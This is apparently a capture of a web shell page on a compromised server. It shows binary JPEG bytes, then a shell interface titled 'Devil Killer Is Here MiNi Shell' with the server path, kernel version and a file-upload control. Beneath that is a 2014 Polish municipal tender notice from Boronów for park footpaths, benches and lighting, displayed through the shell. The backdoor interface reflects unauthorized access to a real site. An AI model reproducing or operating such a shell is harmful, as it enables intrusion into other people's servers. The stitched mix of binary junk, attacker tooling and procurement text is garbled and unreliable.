JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140321/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140321/95664-N-2014.html

<p class="kh_header"><b>Boronów: Zagospodarowanie terenu przy  skrzyżowaniu ulic Wolności  - Wojska Polskiego od strony południowo - wschodniej, Etap V</b><br>
<b>Numer ogłoszenia: 95664 - 2014; data zamieszczenia: 21.03.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Boronów , ul. Dolna 2, 42-283 Boronów, woj. śląskie, tel. 034 3539100, faks 034 3669814.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.boronow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zagospodarowanie terenu przy  skrzyżowaniu ulic Wolności  - Wojska Polskiego od strony południowo - wschodniej, Etap V.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem  inwestycji jest   zagospodarowanie terenu w części południowo-wschodniej skrzyżowania ulic Wolności i Wojska Polskiego w Boronowie. Projekt obejmuje: budowę parkingu wraz z układem dróg dojazdowych i przebudową zjazdu z drogi wojewódzkiej nr 905 (ul. Wolności w Boronowie), budowę ciągów komunikacji pieszej i pieszo-rowerowej, budowę placu z fontanną i placu zabaw, budowę zbiornika wodnego, budowę maszynowni fontanny, budowę przyłącza wody oraz sieci kanalizacyjnej, wewnętrznych linii zasilających i sieci oświetlenia zewnętrznego. Przedmiotem niniejszego zamówienia jest realizacja Etapu V inwestycji tj. budowa ciągów pieszo-rowerowych (z wyłączeniem ciągu rowerowego wzdłuż DW 905) i pieszych wraz z rozbudową sieci kanalizacyjnej w zakresie niezbędnym do ich odwodnienia oraz ostatnim etapem rozbudowy sieci oświetlenia zewnętrznego, montaż elementów małej architektury wzdłuż ciągów oraz wykonanie zieleńca na warstwie kruszywa łamanego.
1. Podstawowe założenia funkcjonalno-użytkowe
W ramach planowanej inwestycji zaprojektowano trzy ciągi pieszo-rowerowe  oraz  ciągi piesze. Układ ciągów wyznacza trzy główne osie widokowe na zabytkowy kościół, a także łączy komunikacyjnie zarówno istniejące, jak i projektowane elementy zagospodarowania terenu (place, parking, zbiornik wodny). Wzdłuż dwóch ciągów pieszo-rowerowych planuje się budowę łukowatych placyków (poszerzeń) z miejscami do siedzenia. Zakłada się zróżnicowanie kolorystyczne ciągów przeznaczonych dla ruchu rowerów i tych przeznaczonych dla ruchu pieszego. Elementami wyposażenia ciągów będą ławki, stojaki na rowery, kosze na odpady oraz słupy oświetlenia parkowego (elementy wyposażenia dodatkowego opisano w punkcie Pozostałe elementy zagospodarowania terenu). Projektowane ciągi należy odwodnić zapewniając spadek w kierunku wpustów - zgodnie z projektem drogowym.
	
2. Opis rozwiązań materiałowo-konstrukcyjnych - NAWIERZCHNIE UTWARDZONE
Nawierzchnie utwardzone należy wykonać zgodnie z wytycznymi zawartymi na rysunkach. W zależności od rodzaju przyjętej nawierzchni należy zastosować odpowiednie warstwy podbudowy, zgodnie z informacjami zawartymi na przekrojach i w projekcie drogowym. Przewiduje się zastosowanie następujących rodzajów nawierzchni:
1. nawierzchnia z kostki betonowej o wymiarach 11,8x11,8cm i gr. 8cm, w kolorze czerwonym, w systemowych obrzeżach betonowych w kolorze szarym; konstrukcje podbudowy oraz spadki terenu należy wykonać zgodnie z opisem na przekrojach i wytycznymi zawartymi w projekcie drogowym; planuje się zastosowanie kostki betonowej w kolorze czerwonym na pasach przeznaczonych dla ruchu rowerów oraz na ciągu przecinającym plac z fontanną;
2.  nawierzchnia z kostki betonowej o wymiarach 11,8x11,8cm i gr. 8cm, w kolorze szarym, w systemowych obrzeżach betonowych w kolorze szarym; konstrukcje podbudowy oraz spadki terenu należy wykonać zgodnie z opisem na przekrojach i wytycznymi zawartym i w projekcie drogowym; planuje się zastosowanie kostki betonowej w kolorze szarym naciągach przeznaczonych dla ruchu pieszego;

SCHODY TERENOWE, PODJAZD DLA ROWERZYSTÓW
Projektuje się, że schody terenowe będą wykonane z takiej samej nawierzchni, jak ciągi piesze. Każda krawędź stopnia będzie wykonana z krawężnika betonowego, osadzonego w ławie z chudego betonu. Krawężnik będzie stanowił zamknięcie przestrzeni, która będzie wykończona kostką betonową o wymiarach 11,8x11,8x8cm w kolorze szarym, ułożoną na warstwach podbudowy. Każdy stopień należy wykonać w 5% spadku w kierunku zejścia, równolegle do schodów - zgodnie z oznaczeniem na rysunku. Wzdłuż schodów zaprojektowano podjazd dla rowerzystów, o nachyleniu podłużnym wynoszącym 15%, wykończony kostką betonową o wymiarach 11,8x11,8x8cm w kolorze czerwonym, ułożoną na warstwach podbudowy. Dla schodów i podjazdu dla rowerzystów przyjęto następujący układ warstw utwardzenia (od dołu):
- projektowany nasyp (grunt G1),
- podbudowa z tłucznia kamiennego 31,5-63mm gr. 20cm, stabilizowanego mechanicznie,
- warstwa z kruszywa łamanego 0-31,5mm gr. 15cm,
- podsypka piaskowo-cementowa gr. 3cm,
- kostka betonowa 11,8x11,8cm gr. 8cm.
Pod schodami i podjazdem dla rowerów, w projektowanej skarpie, należy wykonać przepust zgodnie z projektem drogowym

PROJEKTOWANE ZIELEŃCE
W ramach planowanej inwestycji przewiduje się ponowne ukształtowanie części terenu tak, aby możliwe było zachowanie prawidłowych spadków na projektowanych ciągach komunikacyjnych i placach (zgodnie z rzędnymi terenu przyjętymi w projekcie drogowym). W związku z tym, we wskazanych na rysunku miejscach, konieczne będzie ponownie obsianie terenu trawą. Projektowanego zieleńce należy wykonać zgodnie z wytycznymi zawartymi w projekcie drogowym.
ŁAWKI PARKOWE, STOJAKI NA ROWERY, KOSZE NA ODPADY
W ramach projektowanego zagospodarowania przewiduje się montaż elementów małej architektury tj.: ławki parkowe, stojaki na rowery, kosze na odpady. Zakłada się zastosowanie systemowych produktów, mocowanych na stałe do podłoża, o wyglądzie zgodnym z przedstawionym na załączonych kartach katalogowych tj.:
a.ławek parkowych z oparciem: długość 180cm, konstrukcja stalowa, ocynkowana, malowana proszkowo na kolor RAL 9007, siedzisko i oparcie wykonane z drewnianych szczeblin z drewna egzotycznego np.: jatoba; ławki należy montować do stóp fundamentowych za pośrednictwem kotew mocujących; zakłada się zastosowanie ławek z oparciem wzdłuż projektowanych ciągów pieszo-rowerowych;
b.ławek parkowych dwustronnych z oparciem: długość 180cm, konstrukcja stalowa, ocynkowana, malowana proszkowo na kolor RAL 9007, siedzisko i oparcie wykonane z drewnianych szczeblin z drewna egzotycznego np.: jatoba; ławki należy montować do stóp fundamentowych za pośrednictwem kotew mocujących; zakłada się zastosowanie ławek dwustronnych z oparciem na placu z fontanną;
c. ławek parkowych bez oparcia: długość 150cm, konstrukcja stalowa, ocynkowana, malowana proszkowo na kolor RAL 9007, siedzisko i oparcie wykonane z drewnianych szczeblin z drewna egzotycznego np.: jatoba; ławki należy montować do stóp fundamentowych za pośrednictwem kotew mocujących; zakłada się zastosowanie ławek bez oparcia na placu z fontanną, wzdłuż przecinającego plac ciągu pieszego;

d. stojaków na rowery: konstrukcja stalowa, ocynkowana, malowana proszkowo na kolor RAL 9007; stojaki należy montować do stóp fundamentowych za pośrednictwem kotew mocujących; zakłada się zastosowanie stojaków na rowery wzdłuż ciągów pieszo - rowerowych

e. koszy na odpady z daszkiem: pojemność 30l, konstrukcja stalowa, ocynkowana, malowana proszkowo na kolor RAL 9007, wykończenie ze szczeblin z drewna egzotycznego np.: jatoba, popielnik ze stali nierdzewnej, daszek; kosze należy mocować do stóp fundamentowych za pośrednictwem kotew mocujących; zakłada się zastosowanie koszy na odpady wzdłuż głównych ciągów pieszo-rowerowych oraz na projektowanym parkingu.

OŚWIETLENIE TERENU

Przewiduje się oświetlenie całego terenu latarniami ulicznymi (parkowymi), rozmieszczonymi wzdłuż głównych ciągów pieszo-rowerowych oraz na projektowanych placach i parkingu. Układ i rozmieszczenie słupów oświetleniowych pokazano na rysunku zagospodarowania terenu. Szczegółowy opis oświetlenia zawarto w projekcie branżowym
	

Szczegółowy zakres zamówienia  określa  przedmiar robót - załącznik nr 3 do SIWZ, specyfikacje techniczne wykonania i odbioru robót - Zał. Nr 12 oraz dokumentacja projektowa - załącznik nr 13 do SIWZ..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający   przewiduje możliwości udzielenia  zamówień uzupełniających z zakresu wykonywania nawierzchni   z kostki betonowej wraz z odwodnieniem  do 50 %  wartości zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.11.12.91-4, 45.31.11.00-1, 45.31.12.00-2, 45.31.61.00-6, 45.31.61.10-9, 45.31.53.00-1, 45.31.56.00-4, 34.92.85.00-3, 37.92.85.10-6, 45.10.00.00-8, 45.23.00.00-8, 45.23.30.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.09.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający  wymaga wniesienia wadium w wysokości 20.000,00 zł 
    Wadium może być wniesione w jednej lub w kilku następujących formach:
pieniądzu,
poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
	gwarancjach  bankowych,
	gwarancjach ubezpieczeniowych,
	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu  Polskiej Agencji  Rozwoju Przedsiębiorczości  ( Dz. U. Nr 109, poz. 1158  z późń.zm. ) .

Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy w Banku  Spółdzielczym w Koszęcin nie o/Herby z/s w Boronowie na konto: 
nr 27 8288 1014 2001 0000 0450 0005,  przy czym za termin wniesienia wadium w formie przelewu pieniężnego przyjmuje się termin uznania na rachunku Zamawiającego.
Wadium wnoszone w innej formie niż pieniądz należy złożyć  w formie oryginału w siedzibie zamawiającego, pok. Nr 11 - sekretariat,  do dnia  07.04.2014 r.   do godz. 10:00., a kserokopię dołączyć do koperty.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące:
1. Posiadania wiedzy i doświadczenia tj. wykażą, że w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres działalności jest krótszy - w tym okresie wykonali roboty budowlane w zakresie niezbędnym do wykazania spełnienia warunku wiedzy i doświadczenia tj.
- co najmniej  roboty budowlane z zakresu budowy nawierzchni z kostki brukowej wraz 
z odwodnieniem, o powierzchni minimum 2000 m2 każda oraz załączą dokumenty potwierdzające że roboty zostały wykonane zgodnie  z zasadami sztuki budowlanej i prawidłowo ukończone.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a) wykażą że dysponują osobami, które będą uczestniczyć
 w wykonywaniu zamówienia w szczególności odpowiedzialnych za świadczenie usług , kontrolę jakości lub kierowanie robotami budowlanymi wraz z  informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także wykonywanych przez nie czynności oraz informacje o podstawie do dysponowania tymi osobami tj.
- kierownik budowy posiadający uprawnienia do kierowania robotami budowlanymi 
w specjalności drogowej
- kierownik budowy posiadający uprawnienia do kierowania robotami budowlanymi
 w specjalności  instalacyjnej w zakresie sieci  kanalizacyjnych
- kierownik budowy posiadający uprawnienia do kierowania robotami budowlanymi 
w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych
b) wykażą że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a w przypadku gdy okres prowadzenia działalności jest krótszy - w tym okresie, w okresie jednego roku średnie roczne zatrudnienie u wykonawcy robót budowlanych oraz liczebność personelu kierowniczego wynosiło min. 25 osób.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>3. Sytuacji ekonomicznej i finansowej, tj. są ubezpieczeni od odpowiedzialności cywilnej w zakresie działalności związanej z przedmiotem zamówienia na kwotę, co najmniej 1.000. 000 złotych (słownie : jeden milion złoty)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>roboty budowlane z zakresu budowy nawierzchni z kostki brukowej wraz 
z odwodnieniem, o powierzchni minimum 2000 m2;</li>

<li  style="margin-bottom: 12px;">oświadczenie na temat wielkości średniego rocznego zatrudnienia u wykonawcy usług lub robót budowlanych oraz liczebności personelu kierowniczego w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a w przypadku gdy okres prowadzenia działalności jest krótszy - w tym okresie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a. kosztorys ofertowy w formie uproszczonej wraz z tabelą elementów scalonych, sporządzony na podstawie przedmiaru robót stanowiącego   załączniki  nr 3do  SIWZ
b. informację o częściach zamówienia, które wykonawca podzleci podwykonawcom - według wzoru stanowiącego  załącznik nr 7 do SIWZ,</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>10.Na podstawie art. 144 ustawy Pzp zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści złożonej oferty na podstawie której dokonano wyboru wykonawcy, w przypadku wystąpienia co najmniej jednej z okoliczności wymienionych poniżej z uwzględnieniem podawanych warunków ich wprowadzenia:
10.1.Zmiany w zakresie terminu realizacji zamówienia:
   a/ zmiany spowodowane niekorzystnymi warunkami atmosferycznymi,  uniemożliwiającymi wykonanie robót, w szczególności:
       - klęski żywiołowe,
       - działania siły wyższej,
   b/ zmiany spowodowane warunkami geologicznymi, archeologicznymi lub  terenowymi,
 w szczególności:
       - niewybuchy, niewypały,
       - wykopaliska archeologiczne,
       - wystąpienie niezinwentaryzowanych obiektów, urządzeń, obiektów itp.,
   c/ zmiany będące następstwem okoliczności leżących po stronie zamawiającego, w szczególności:
       - wstrzymanie robót przez zamawiającego na jego wyraźny wniosek,
   d/ konieczność udzielenia zamówień dodatkowych w rozumieniu przepisów Pzp,
   e/ inne przyczyny zewnętrzne niezależne od zamawiającego oraz wykonawcy skutkujące niemożnością prowadzenia prac,
   f/ inne okoliczności np. związane z przedłużającą się procedurą przetargową mającą  wpływ na termin podpisania umowy i przystąpienie do realizacji robót.
10.1.1.Warunki dokonania zmian:
    - w przypadku wystąpienia którejkolwiek okoliczności wymienionej powyżej  termin  wykonania umowy może ulec odpowiedniemu przedłużeniu o czas niezbędny do zakończenia wykonania jej przedmiotu w sposób należyty, nie dłużej jednak niż o okres trwania tych okoliczności.
10.2.Zmiany sposobu spełniania świadczenia co może spowodować zmianę terminu realizacji zamówienia , zmianę wynagrodzenia wykonawcy:
- zmiany technologiczne, w szczególności  konieczność zrealizowania przedmiotu umowy przy zastosowaniu innych rozwiązań lub materiałów ze względu na zmianę obowiązującego prawa.
10.2.1.Powyższe zmiany będą wprowadzone wyłącznie w zakresie umożliwiającym oddanie przedmiotu umowy do użytkowania , a Zamawiający może ponieść ryzyko zwiększenia wynagrodzenia z tytułu takich zmian wyłącznie w kwocie równej zwiększonym z tego powodu kosztom. 
10.3.Zmiany osobowe, w tym zmiany podwykonawców:
- zmiana osób przy pomocy których wykonawca realizuje przedmiot umowy na inne legitymujące się co najmniej równoważnymi uprawnieniami i kwalifikacjami , o których mowa w ustawie Prawo budowlane lub innych ustawach, a także SIWZ będzie wymagała także zaakceptowania przez zamawiającego. 
10.4. Pozostałe zmiany:
- zmiana stawki VAT:
  a/ jeśli zmiany stawki VAT będą powodować zwiększenie kosztów wykonania umowy    po stronie wykonawcy, zamawiający dopuszcza możliwość zwiększenia wynagrodzenia o kwotę równą różnicy w kwocie podatku VAT zapłaconego przez wykonawcę,
  b/jeśli zmiana stawki VAT będzie powodować zmniejszenie kosztów wykonania  umowy po stronie wykonawcy, zamawiający dopuszcza możliwość zmniejszenia wynagrodzenia o kwotę stanowiącą różnicę kwoty VAT do zapłacenia przez wykonawcę.  
